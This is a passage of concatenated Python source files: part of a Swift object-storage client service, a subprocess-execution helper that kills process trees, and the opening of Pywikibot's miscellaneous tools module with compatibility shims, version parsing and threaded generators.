self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster whose capabilities are retrieved.
:param refresh_cache: If True, ignore any cached result and query the
cluster again.
:returns: A dictionary containing the capabilities of the cluster.
:raises ClientException:
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue.
If the future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
exec_proc_.py
|
import os
import signal
import subprocess
import sys
import types
from contextlib import contextmanager
from logging import getLogger
from threading import Thread
from typing import *
__all__ = ['timed_wait_proc', 'exec_proc']
OutputCallbackType = Callable[[bytes], None]
def timed_wait_proc(proc: subprocess.Popen, timeout: float) -> Optional[int]:
"""
Wait for a process to exit, for at most `timeout` seconds.
Args:
proc: The process to wait for.
timeout: The timeout in seconds.
Returns:
The exit code, or :obj:`None` if the process does not exit.
"""
try:
return proc.wait(timeout)
except subprocess.TimeoutExpired:
return None
def recursive_kill(proc: subprocess.Popen,
ctrl_c_timeout: float = 3,
kill_timeout: float = 10) -> Optional[int]:
"""
Recursively kill a process tree.
Args:
proc: The process to kill.
ctrl_c_timeout: Seconds to wait for the program to respond to
CTRL+C signal.
kill_timeout: Seconds to wait for the program to be killed.
Returns:
The return code, or None if the process cannot be killed.
"""
if sys.platform != 'win32':
try:
gid = os.getpgid(proc.pid)
except Exception:
# the pid does not exist; nothing to kill
return
def kill_fn(s):
os.killpg(gid, s)
else: # pragma: no cover
def kill_fn(s):
if s == signal.SIGINT:
os.kill(proc.pid, signal.CTRL_C_EVENT)
else:
proc.terminate()
# try to kill the process by ctrl+c
kill_fn(signal.SIGINT)
code = timed_wait_proc(proc, ctrl_c_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGINT, plan to kill '
f'it by SIGTERM or SIGKILL.')
else:
return code
# try to kill the process by SIGTERM
if sys.platform != 'win32':
kill_fn(signal.SIGTERM)
code = timed_wait_proc(proc, kill_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGTERM, plan to '
f'kill it by SIGKILL.')
else:
return code
# try to kill the process by SIGKILL
kill_fn(signal.SIGKILL)
code = timed_wait_proc(proc, kill_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGKILL, give up.')
return code
@contextmanager
def exec_proc(args: Union[str, Iterable[str]],
on_stdout: OutputCallbackType = None,
on_stderr: OutputCallbackType = None,
stderr_to_stdout: bool = False,
buffer_size: int = 16 * 1024,
ctrl_c_timeout: float = 3,
**kwargs) -> Generator[subprocess.Popen, None, None]:
"""
Execute an external program within a context.
Args:
args: Command line or arguments of the program.
If it is a command line, then `shell = True` will be set.
on_stdout: Callback for capturing stdout.
on_stderr: Callback for capturing stderr.
stderr_to_stdout: Whether or not to redirect stderr to stdout.
If True, `on_stderr` will be ignored.
buffer_size: Size of buffers for reading from stdout and stderr.
ctrl_c_timeout: Seconds to wait for the program to respond to
CTRL+C signal.
\\**kwargs: Other named arguments passed to :func:`subprocess.Popen`.
Yields:
The process object.
"""
# check the arguments
if stderr_to_stdout:
kwargs['stderr'] = subprocess.STDOUT
on_stderr = None
if on_stdout is not None:
kwargs['stdout'] = subprocess.PIPE
if on_stderr is not None:
kwargs['stderr'] = subprocess.PIPE
# output reader
def reader_func(fd, action):
while not stopped[0]:
buf = os.read(fd, buffer_size)
if not buf:
break
action(buf)
def make_reader_thread(fd, action):
th = Thread(target=reader_func, args=(fd, action))
th.daemon = True
th.start()
return th
# internal flags
stopped = [False]
# launch the process
stdout_thread = None # type: Thread
stderr_thread = None # type: Thread
if isinstance(args, (str, bytes)):
shell = True
else:
args = tuple(args)
shell = False
if sys.platform != 'win32':
kwargs.setdefault('preexec_fn', os.setsid)
proc = subprocess.Popen(args, shell=shell, **kwargs)
# patch the kill() to ensure the whole process group would be killed,
# in case `shell = True`.
def my_kill(self, ctrl_c_timeout=ctrl_c_timeout):
recursive_kill(self, ctrl_c_timeout=ctrl_c_timeout)
proc.kill = types.MethodType(my_kill, proc)
try:
if on_stdout is not None:
stdout_thread = make_reader_thread(proc.stdout.fileno(), on_stdout)
if on_stderr is not None:
stderr_thread = make_reader_thread(proc.stderr.fileno(), on_stderr)
try:
yield proc
except KeyboardInterrupt: # pragma: no cover
if proc.poll() is None:
# Wait for a while to ensure the program has properly dealt
# with the interruption signal. This will help to capture
# the final output of the program.
# TODO: use signal.signal instead for better treatment
_ = timed_wait_proc(proc, 1)
finally:
if proc.poll() is None:
proc.kill()
# Wait for the reader threads to exit
stopped[0] = True
for th in (stdout_thread, stderr_thread):
if th is not None:
th.join()
# Ensure all the pipes are closed.
for f in (proc.stdout, proc.stderr, proc.stdin):
if f is not None:
try:
f.close()
except Exception: # pragma: no cover
getLogger(__name__).info(
'Failed to close a sub-process pipe.',
exc_info=True
)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id: 7e1c9c15b0d121bbe9e36717aa3be86d42ac86c0 $'
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import re
import stat
import subprocess
import sys
import threading
import time
import types
from distutils.version import Version
from warnings import warn
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if not PY2:
import queue as Queue
StringTypes = basestring = (str,)
UnicodeType = unicode = str
else:
import Queue
StringTypes = types.StringTypes
UnicodeType = types.UnicodeType
from pywikibot.logging import debug
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
if PYTHON_VERSION < (3, 5):
# although completely deprecated in Python 3, no warning was emitted until 3.5
ArgSpec = inspect.ArgSpec
getargspec = inspect.getargspec
else:
ArgSpec = collections.namedtuple('ArgSpec', ['args', 'varargs', 'keywords',
'defaults'])
def getargspec(func):
"""Python 3 implementation using inspect.signature."""
sig = inspect.signature(func)
args = []
defaults = []
varargs = None
kwargs = None
for p in sig.parameters.values():
if p.kind == inspect.Parameter.VAR_POSITIONAL:
varargs = p.name
elif p.kind == inspect.Parameter.VAR_KEYWORD:
kwargs = p.name
else:
args += [p.name]
if p.default != inspect.Parameter.empty:
defaults += [p.default]
if defaults:
defaults = tuple(defaults)
else:
defaults = None
return ArgSpec(args, varargs, kwargs, defaults)
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
class NotImplementedClass(object):
"""No implementation is available."""
def __init__(self, *args, **kwargs):
"""Constructor."""
raise NotImplementedError(
'%s: %s' % (self.__class__.__name__, self.__doc__))
if PYTHON_VERSION < (2, 7):
try:
import future.backports.misc
except ImportError:
warn("""
pywikibot support of Python 2.6 relies on package future for many features.
Please upgrade to Python 2.7+ or Python 3.3+, or run:
"pip install future>=0.15.0"
""", RuntimeWarning)
try:
from ordereddict import OrderedDict
except ImportError:
class OrderedDict(NotImplementedClass):
"""OrderedDict not found."""
pass
try:
from counter import Counter
except ImportError:
class Counter(NotImplementedClass):
"""Counter not found."""
pass
count = None
else:
Counter = future.backports.misc.Counter
OrderedDict = future.backports.misc.OrderedDict
try:
count = future.backports.misc.count
except AttributeError:
warn('Please update the "future" package to at least version '
'0.15.0 to use its count.', RuntimeWarning, 2)
count = None
del future
if count is None:
def count(start=0, step=1):
"""Backported C{count} to support keyword arguments and step."""
while True:
yield start
start += step
else:
Counter = collections.Counter
OrderedDict = collections.OrderedDict
count = itertools.count
def has_module(module):
"""Check whether a module can be imported."""
try:
__import__(module)
except ImportError:
return False
else:
return True
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
def py2_encode_utf_8(func):
"""Decorator to optionally encode the string result of a function on Python 2.x."""
if PY2:
return lambda s: func(s).encode('utf-8')
else:
return func
class classproperty(object): # flake8: disable=N801
"""
Descriptor to access a class method as a property.
This class may be used as a decorator::
class Foo(object):
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class UnicodeMixin(object):
"""Mixin class to add __str__ method in Python 2 or 3."""
@py2_encode_utf_8
def __str__(self):
"""Return the unicode representation as the str representation."""
return self.__unicode__()
# From http://python3porting.com/preparing.html
class ComparableMixin(object):
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
class DotReadableDict(UnicodeMixin):
"""Parent class of Revision() and FileInfo().
Provide:
- __getitem__(), __unicode__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
The Revision class may also give access to its values by key,
e.g. the revid parameter may be accessed as revision['revid']
as well as revision.revid. This makes formatting strings with
the % operator easier.
"""
return getattr(self, key)
def __unicode__(self):
"""Return string representation."""
# TODO: This is more efficient if the PY2 test is done during
# class instantiation, and not inside the method.
if not PY2:
return repr(self.__dict__)
else:
_content = u', '.join(
u'{0}: {1}'.format(k, v) for k, v in self.__dict__.items())
return u'{{{0}}}'.format(_content)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error=None):
"""
Constructor.
@param data: mapping to freeze
@type data: mapping
@param error: error message
@type error: basestring
"""
if data:
args = [data]
else:
args = []
super(FrozenDict, self).__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
def concat_options(message, line_length, options):
"""Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = u''
option_line = u''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return u'{0} ({1}):'.format(message, option_msg)
class LazyRegex(object):
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Constructor.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super(LazyRegex, self).__init__()
@property
def raw(self):
"""Get raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
"""Set raw property."""
self._raw = value
self._compiled = None
@property
def flags(self):
"""Get flags property."""
return self._flags
@flags.setter
def flags(self, value):
"""Set flags property."""
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None):
"""
Constructor.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super(DeprecatedRegex, self).__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, 2)
return super(DeprecatedRegex, self).__getattr__(attr)
def first_lower(string):
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string):
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].upper() + string[1:]
def normalize_username(username):
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
The version mainly consists of digits separated by periods. After that is a
suffix which may only be 'wmf<number>', 'alpha', 'beta<number>' or
'-rc.<number>' (the - and . are optional). They are considered from old to
new in that order, with a version number without a suffix considered the
newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if its normal version is greater, or the normal versions
are equal and its dev version is greater. For example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
< 1.25-rc-1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'^(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({0!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{0}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{0}" in "{1}"'.format(handled, version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{0}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, basestring):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
if PY2:
__cmp__ = _cmp
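# Illustrative sketch (assumed example values) of the ordering documented in
# the MediaWikiVersion docstring above:
#
#     MediaWikiVersion('1.25wmf1') < MediaWikiVersion('1.25alpha')    # True
#     MediaWikiVersion('1.25beta2') < MediaWikiVersion('1.25')        # True
#     MediaWikiVersion.from_generator('MediaWiki 1.25.1')             # 1.25.1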
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name="GeneratorThread",
args=(), kwargs=None, qsize=65536):
"""Constructor. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, "generator"):
raise RuntimeError("No generator for ThreadedGenerator to run.")
self.args, self.kwargs = args, kwargs
threading.Thread.__init__(self, group=group, name=name)
self.queue = Queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.isAlive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except Queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except Queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, **kwargs):
u"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
The function takes the same positional arguments as C{itertools.islice}
(see @param args below) and the additional keyword marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@keyword marker: element to yield if iterable still contains elements
after showing the required number.
Default value: '…'
No other kwargs are considered.
@type marker: str
"""
s = slice(*args)
marker = kwargs.pop('marker', '…')
try:
k, v = kwargs.popitem()
raise TypeError(
"islice_with_ellipsis() take only 'marker' as keyword arg, not %s"
% k)
except KeyError:
pass
_iterable = iter(iterable)
for el in itertools.islice(_iterable, *args):
yield el
if marker and s.stop is not None:
try:
next(_iterable)
except StopIteration:
pass
else:
yield marker
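# Illustrative sketch of the continuation-marker behaviour (assumed values):
#
#     list(islice_with_ellipsis(range(5), 3))   # -> [0, 1, 2, '…']
#     list(islice_with_ellipsis(range(3), 3))   # -> [0, 1, 2]  (nothing left over)
#     list(islice_with_ellipsis(range(5), 3, marker='...'))   # custom marker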
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = "threadlist"
def __init__(self, limit=128, *args):
"""Constructor."""
self.limit = limit
super(ThreadList, self).__init__(*args)
for item in self:
if not isinstance(item, threading.Thread):
raise TypeError("Cannot add '%s' to ThreadList" % type(item))
def active_count(self):
"""Return the number of alive threads, and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.isAlive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '%s' to ThreadList" % type(thd))
while self.active_count() >= self.limit:
time.sleep(2)
super(ThreadList, self).append(thd)
thd.start()
debug("thread %d ('%s') started" % (len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug(u'EARLY QUIT: Threads: %d' % len(self), self._logger)
for thd in self:
thd.stop()
debug(u'EARLY QUIT: Queue size left in %s: %s'
% (thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({0!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
cache = collections.defaultdict(set)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
# Cache entry is a set of thread.
# Duplicates from same thread are not counted twice.
cache[item].add(t)
if len(cache[item]) == n_gen:
yield item
# Remove item from cache.
# No chance of seeing it again (see later: early stop).
cache.pop(item)
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only when we have lost one
# generator, then we can bail out early based on seen items.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except Queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into
the keys of a dict created as a local variable, each with a value of True.
It only yields items which are not already present in the local dict.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local dict which can not be cleared.
Also, the local dict can't be re-used when chaining unique operations on
multiple generators.
To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = {}
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
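# Illustrative sketch of filter_unique (assumed example values):
#
#     list(filter_unique([1, 3, 1, 2, 3]))      # -> [1, 3, 2]
#
# Using a caller-provided container with hashes as keys, as suggested in the
# docstring above:
#
#     seen = set()
#     unique_pages = filter_unique(pages, container=seen, key=hash)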
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, collections.Mapping):
"""
A default for a not existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
empty collection, so it can safely be iterated over if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in a combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def _empty_iter(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
iteritems = itervalues = iterkeys = __iter__ = _empty_iter
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin(object):
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {0}'.format(self._own_desc),
'it directly', 2)
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
class SelfCallString(SelfCallMixin, str):
"""Unicode string with SelfCallMixin."""
class IteratorNextMixin(collections.Iterator):
"""Backwards compatibility for Iterators."""
if PY2:
def next(self):
"""Python 2 next."""
return self.__next__()
class DequeGenerator(IteratorNextMixin, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Python 3 iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
class ContextManagerWrapper(object):
"""
Wraps an object in a context manager.
It redirects all access to the wrapped object and executes 'close' when
used as a context manager in with-statements. In such statements the value
bound via 'as' is the wrapped object itself. For example:
>>> class Wrapper(object):
... def close(self): pass
>>> an_object = Wrapper()
>>> wrapped = ContextManagerWrapper(an_object)
>>> with wrapped as another_object:
... assert another_object is an_object
It does not subclass the object though, so isinstance checks will fail
outside a with-statement.
"""
def __init__(self, wrapped):
"""Create a new wrapper."""
super(ContextManagerWrapper, self).__init__()
super(ContextManagerWrapper, self).__setattr__('_wrapped', wrapped)
def __enter__(self):
"""Enter a context manager and use the wrapped object directly."""
return self._wrapped
def __exit__(self, exc_type, exc_value, traceback):
"""Call close on the wrapped object when exiting a context manager."""
self._wrapped.close()
def __getattr__(self, name):
"""Get the attribute from the wrapped object."""
return getattr(self._wrapped, name)
def __setattr__(self, name, value):
"""Set the attribute in the wrapped object."""
setattr(self._wrapped, name, value)
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip and 7zip as compression containers. It
uses the packages available in the standard library for bzip2 and gzip, so
they are always available. 7zip is only supported when the external 7za
program is installed, and then only for reading.
The compression is either selected via the magic number or file ending.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: string
@raises ValueError: When 7za is not available or the opening mode is unknown
or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm (or
IOError on Python 2).
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@return: A file-like object returning the uncompressed data in binary mode.
Before Python 2.7 the GzipFile object and before 2.7.1 the BZ2File are
wrapped in a ContextManagerWrapper with its advantages/disadvantages.
@rtype: file-like object
"""
def wrap(wrapped, sub_ver):
"""Wrap in a wrapper when this is below Python version 2.7."""
if PYTHON_VERSION < (2, 7, sub_ver):
return ContextManagerWrapper(wrapped)
else:
return wrapped
